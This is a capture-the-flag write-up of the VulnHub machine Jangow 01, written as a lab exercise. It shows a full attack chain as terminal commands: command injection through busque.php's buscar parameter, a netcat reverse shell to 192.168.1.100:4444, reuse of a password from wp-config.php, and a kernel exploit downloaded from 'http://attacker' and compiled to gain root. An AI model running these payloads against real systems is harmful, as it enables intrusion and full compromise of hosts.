CTF WRITEUP VULNHUB BLACK BOX EASY

Jangow 01 — VulnHub Easy

person

Written By

Th0mas_sh316y

Difficulty

Platform

VulnHub

Target IP

192.168.1.10

Jangow 01 Machine
Machine: Jangow 01 · Easy · Linux · VulnHub

Jangow 01 is a clean intro box that hinges on one specific finding — a search page parameter that pipes directly into the shell. The privesc is a kernel exploit because the box ships with a deliberately old kernel. Total time was around 45 minutes. Honestly the trickiest part was finding busque.php in the directory listing — it's not in standard wordlists.

01_Reconnaissance

FTP on 21 (anon login disabled), HTTP on 80. Site is in Spanish, mostly static pages. Run dirb to map the file tree.

terminal / dirb
$ nmap -sV -p- 192.168.1.10
21/tcp open  ftp     vsftpd
80/tcp open  http    Apache 2.4.18

$ dirb http://192.168.1.10/site/
==> DIRECTORY: /site/wordpress/
+ /site/busque.php
+ /site/busque.php (200 OK) — search endpoint

02_busque.php_Command_Injection

busque.php takes a buscar parameter and pipes it straight into the shell. Append ;id and the output appears in the response. Classic injection sink — upgrade to a reverse shell.

terminal / cmd injection
# Confirm injection
$ curl "http://192.168.1.10/site/busque.php?buscar=;id"
uid=33(www-data) gid=33(www-data)

# Reverse shell payload (URL-encoded)
$ curl "http://192.168.1.10/site/busque.php?buscar=;nc%20-e%20/bin/bash%20192.168.1.100%204444"

# Listener
$ nc -lvnp 4444
www-data@jangow01:/$ python3 -c 'import pty; pty.spawn("/bin/bash")'

03_Credential_Recovery_from_config.php

Inside the WordPress install on the same box, wp-config.php holds the MySQL DB credentials. The DB password is reused for the local user jangow01. su jangow01 with that password gives a stable shell.

terminal / config.php
$ cat /var/www/html/site/wordpress/wp-config.php | grep DB_
define('DB_USER', 'jangow01');
define('DB_PASSWORD', '[REDACTED]');

$ su jangow01
Password: [REDACTED]
jangow01@jangow01:~$ id
uid=1000(jangow01) gid=1000(jangow01)

04_PrivEsc_via_Kernel_Exploit

Kernel is 4.4.0 — vulnerable to dirty cow / overlayfs. Compiled the overlayfs PoC, ran it, and got root in seconds.

terminal / kernel exploit
jangow01@jangow01:~$ uname -a
Linux jangow01 4.4.0-31-generic #50-Ubuntu

jangow01@jangow01:/tmp$ wget http://attacker/45010.c
jangow01@jangow01:/tmp$ gcc 45010.c -o exploit
jangow01@jangow01:/tmp$ ./exploit

# id
uid=0(root) gid=0(root)
# cat /root/proof.txt
[REDACTED]

05_Attack_Chain_Summary

  1. 01 nmap → FTP 21 + HTTP 80 → dirb /site/ → busque.php
  2. 02 busque.php?buscar=;id → command injection as www-data
  3. 03 nc reverse shell → upgrade with python3 pty
  4. 04 wp-config.php → DB password reused for user jangow01 → su
  5. 05 Kernel 4.4.0 → overlayfs / dirty-cow exploit → root